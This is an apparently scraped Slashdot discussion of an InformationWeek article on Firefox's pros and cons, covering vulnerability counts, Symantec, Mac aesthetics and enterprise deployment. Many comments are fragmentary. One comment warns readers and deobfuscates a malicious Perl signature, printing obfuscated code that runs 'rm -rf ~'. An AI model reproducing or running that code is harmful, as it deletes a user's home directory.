Pros and Cons of Firefox Critically Evaluated? 674
A Dafa Disciple writes "Fred Langa of Information Week has written an article claiming to discuss the 'Pros and Cons of Firefox'. At first I was excited because I thought I was going to get to finally read an enlightening, in-depth article that critically examined the browser. I should have known better. Aside from the usual criticism of open source software, it contains a reference to a Symantec Internet Security Report which claims that more security vulnerabilities in the last six months of 2004 were found in Firefox than IE. I'll leave it to you to analyze Mr. Langa's opinion and scrutinize Symantec's study and reputation as a security software developer."
Print Version of the Article (Score:5, Informative)
In other news...Firefox 1.0.3 released (Score:5, Informative)
Mod Parent Down-Malicious Perl Code in Sig (Score:2, Informative)
Firefox eased my pain (Score:5, Informative)
Security vulnerabilites my ass.
(yes I know spyware and security is different, but firefox sure is a lot less of a pain in the ass)
Re:The biggest downside to Firefox (Score:5, Informative)
Its called mozilla.
Firefox is mozilla with most of the extra stuff besides the browser cut out.
Information week (Score:2, Informative)
Second, the guy looks like a total Asshat [wikipedia.org]. Look at his picture for christs sakes Fred Langa [cmpnet.com]
Re:The biggest downside to Firefox (Score:3, Informative)
Re:symantec (Score:2, Informative)
Only time I saw it miss something that major completely, but it killed the little hope I had left for the product.
Re:symantec (Score:5, Informative)
I personally run Grisoft's AVG for free, and Zone Alarm, and not only have I never had a virus/worm, they run a zillion times faster than Norton AntiVirus and Personal Firewall.
Symantec makes bloatware that doesn't work well. Avoid it like the plague.
Re:Cons of Mac Firefox (Score:3, Informative)
The reason why everything looks the same on a Mac is that developers use the system frameworks to draw their on-screen controls. If a program has a control that looks wrong, as Firefox does, that's because the program actually is wrong. If it were using the correct frameworks to draw its controls, the controls would look right.
This is a case where the fact that it looks wrong is a sign that it really is wrong.
Now, as for Safari, it's not perfect. But then again, neither is Firefox. Our internal guys assure us that Safari is just as compatible as Firefox with well-formed Web pages, and degrades gracefully with badly-formed pages. And unlike Firefox, Safari is an actual Mac application, with support for Bonjour and Spotlight and (most importantly) the Keychain built right in.
Firefox isn't a Mac application. It's a third-party application that was ported badly to the Mac.
Re:symantec (Score:5, Informative)
Regards,
Steve
Re:If only it was as good as Mozilla. (Score:2, Informative)
i.e. to search google for foo bar try: google foo bar
Firefox actually comes with a few more of these quick searches set up and it's easy to create your own (they are a special bookmark).
One page view - no ads (Score:5, Informative)
http://www.informationweek.com/shared/printableArt icle.jhtml?articleID=160900911 [slashdot.org]
US Cert (Score:3, Informative)
Where did he get this from??
Latest 10 vulnerabilities on front page are all Windows.
If you look at the bulletins like he does, you get a collection of vulnerabilities that have been patched.
US-Cert Vulnerability Notes [cert.org] is where he should be searching if he wants a proper comparison.
Firefox returns 11 results.
I didn't count how many results Internet Explorer returned, but even if you don't count pre-2004 vulnerabilities, the number is still twice as high as it is for Firefox.
Symantec (Score:3, Informative)
Re:The biggest downside to Firefox (Score:3, Informative)
Install Firefox. Install all of your plugins, themes, decorations, bangles, tools.
Copy the Mozilla folder from your home folder application data. Application data is a hidden folder. a little digging will find it though.
On new machine install firefox.
Copy folder to the same place on new machine.
Presto. Nothing lost.
Can be used to create a custom look for your firefox across the network if you'd like. Force a backup of the folder for each user and their prefs all stay after a crash. Put the files on a USB key and carry your firefox with you. Thunderbird too.
Works for me.
Re:More exploits? (Score:1, Informative)
Microsoft is still deeply locked into a corporate LAN mindset where all hosts are trusted, no one does anything shifty, and all users are business users. Meanwhile, they rule the civilian end-user market and the civies aren't remotely trustworthy, have too much free time on their hands, etc. The Internet is not a twenty seat LAN in Bismarck.
On top of this, you have Microsoft's usual bad coding practices, lack of thorough testing inhouse, and this has gone on for years and only compounded itself over and over again. An entire operating system is designed and coded with development tools which are themselves far from bulletproof which were coded on the prior OS iteration which itself was far from bulletproof having been coded on the prior development tool which itself was...
It's like standing between two opposed mirrors, except they're funhouse mirrors and you're sitting there trying to grind them accurate with a handful of abrasive,a sponge, and bucket of water and your boss keeps tossing them out and replacing them with new ones that are only slightly closer to true. "Leave it to the buyer to find the distortions!"
They practice obfuscation, but it has nothing to do with security. They're practicing obscurity in development. Sort of like erasing pieces of your blueprints at random as you think you've built that section correctly.
No Yahoo Logo? (Score:5, Informative)
A quick check of the source told me what was going on. I recognized the yimg URL as one that I had *BLOCKED* images from long ago. Yahoo serves tons of graphics ads all over the Internet and I just blocked them all using Firefox's native ability to block images from a particular URL.
It seems Yahoo serves their own graphics from the same server as their ads. Silly rabbit.
So, it isn't a rendering bug with Firefox, it is a feature! And a damned useful one at that.
feature + ignorance = bug? Sad.
-Charles
Re:The biggest downside to Firefox (Score:5, Informative)
Plugins, BTW, are also in that folder in the user's profile. You know, the one that's stored on a central server in your large network? Just set up firefox once on a test machine, and copy the firefox profile folder to each user's windows profile, then distribute the program files however you prefer to do that kind of thing.
This can't be the first program with a non-MSI install method that an admin of a large network has encountered...
Re:Mod Parent Down-Malicious Perl Code in Sig (Score:5, Informative)
Adding whitespace
($?) ? s:;s:s;;$?:
: s;;=]=>%-{<-|}<&|`{;
y; -/:-@[-`{-};`-{~" -;
s;;$_;see
$? is equal to zero normally, so that's the same as
s//=]=>%-{<-|}<&|`{/;
y/ -\/:-@[-`{-}/`-{~" -/;
s//$_/see
The first statement => $_ = '=]=>%-{<-|}<&|`{';
second translates $_ to 'system"rm -rf ~"'
third: eval $_
Safari has 0 vulnerabilities reported by Secunia (Score:3, Informative)
http://secunia.com/product/1543/ [secunia.com]
- Open source engine
- Less vulnerabilities discovered
- ZERO Unpatched Vulnerabilities
Why will more users = more insecurity? (Score:3, Informative)
Re:Cons of Mac Firefox (Score:3, Informative)
That having been said, I agree with the assessment that Firefox for Mac has a lot of catch-up to do to match Safari in terms of aesthetics. It's one of the biggest cons of choosing Firefox on the Mac platform. Safari, as Apple's own in-house effort, gets a level of fit-and-finish with the rest of the OS that third-party developers can have a tough time matching.
On the other hand, the biggest pro for Firefox on Mac (in my opinion) is the expandability. Safari doesn't have Adblock, BugMeNot, or any of my other favorite extensions. Even Camino doesn't support them. So in my case, I choose expandability over aesthetics and use Firefox as my default browser on Mac.
Ideally though, it would be possible to have both. Maybe in time and with further Firefox development.
-Frank
Re:It's quite possible there are more bugs in Fire (Score:4, Informative)
Exactly. Not that vulnerabily counts aren't important, but you have to dig for more information. The article said there were 13 reported for IE and 21 for Firefox in the same time period. OK. How many of those have been fixed in IE and in Firefox? What was the breakdown on severity? What platforms were affected?
If the author didn't want to go into all this detail to give a more accurate picture, he shouldn't have just thrown out those numbers. I won't go as far as to say they are meaningless, but they don't paint an accurate picture.
Re:The biggest downside to Firefox (Score:2, Informative)
corrected link (Score:2, Informative)
Here's the same link again, except that it's pointing to the correct place...
http://www.informationweek.com/shared/printableAr
formhistory.dat (Score:3, Informative)
formhistory.dat is encrypted.
Ah, the old "security" == "marketshare" claim. (Score:4, Informative)
My Linux box is frequently targetted, but it's all Windows exploits so it doesn't matter. Ah, so there is no such thing as "security" then.
Just "marketshare".
No matter how many software experts put in how much effort, the end result will spontaniously generate "flaws" as more people use it.
By that "logic", there is no difference between a browser ("A") written by a team of experts who focused on security
Flaws do NOT appear just because more people use the software.
Code is not magic.
Not quite (Score:1, Informative)
That's not quite right. It assumes that you can keep it secure (as you say), and it assumes that the workings of the program will not be suceptable to black-box reverse engineering.
IE appears to have hidden the code pretty well. But it has proven very suceptable to reverse engineering.
Re:No Yahoo Logo? (Score:2, Informative)
Yeah, my Adblock is really tight and unforgiving, so I really don't care about a missing picture here or there.
Which is what I find so great about Google...their ads are (a) not offensive since they are not text-based and (b) useful because they text-based and relevant.
US-CERT agrees with Symantec (Score:2, Informative)
Re:The biggest downside to Firefox (Score:1, Informative)
C:\Documents and Settings\All Users\Desktop
Re:The biggest downside to Firefox (Score:4, Informative)
Re:The biggest downside to Firefox (Score:1, Informative)
Guess what, there isn't one. If you contact MS support, they can send you an very crappy MSI wrapper for the IE 6 setup executable. Other than that, you can make your own or find one somebody who has repackaged it. If you do a quick search, you can find Firefox
I found deploying Firefox to a couple thousand machines as easy as deploying IE 6 to the same number of Windows 2000 machines. The IEAK didn't do anything I needed that I couldn't do with FireFox by tweaking few plain text files.
IE does have configuration setting available through group policy, but you can add custom adm files. See:
http://sourceforge.net/projects/firefoxadm
I was working on my own adm templates so I haven't tried these yet, but if you take a look, there are probably more out there.
Re:The biggest downside to Firefox (Score:4, Informative)
Installing Flash is point-and-click. Yes, I just tried it. I'm even on Linux, and it's still point and click.
It's a little puzzle piece that says "Click here to download plugin". After that, everything's automated. You just have to click next a few times and agree to a (Macromedia) license. You don't even have to restart the browser.
If you have any suggestions on how it could be improved, please report them to bugzilla.mozilla.org, or even just post here in reply to me or email me, and I'll do it for you (assuming I agree they'd improve it).
This introduces huge licensing problems. If mozilla.org were to bundle Flash, for example, they would first have to get Macromedia's approval, and even then it would cause other problems, e.g. including it in Debian, which would most likely reject it because of the non-free license.
It also puts a lot more stress on the developers and release-candidate testers, as they have to do double the work.
That's very unfortunate :-(
You should fix your applications. You'll need to eventually, anyway, Firefox is just a good incentive to.
Most people consider the lack of ActiveX a good thing, as it strengthens security considerably.
Most people would take the opposite position here: Firefox has a much better user interface than other browsers and especially Internet Explorer. If you have any specific issues, again, either report them to bugzilla.mozilla.org or send them to me and I'll pass them along to there.
Though most people I've talked to think the support you can get in those forums is better and faster than what you get from most corporate support centers, I can understand why you might need this in a school or company. I believe there are one or perhaps even several third-party companies starting up to provide equivelant support, but I can't be certain off the top of my head. If this is a strong issue, you may want to look into it.
This I know is a real issue, because I've used it myself in school ;-) I'd point out, though, that there are plenty of other ways that students can hide what they're doing, and I've watched friends play games for hours without the teacher knowing it, even in Internet Explorer.
That's unfortunate. I'm sorry the people that found you weren't as helpful.
Re:The biggest downside to Firefox (Score:3, Informative)
This hasn't been true since before 1.0. Now there's a bar at the top of the screen, similar to the one for popups. Much less intrusive.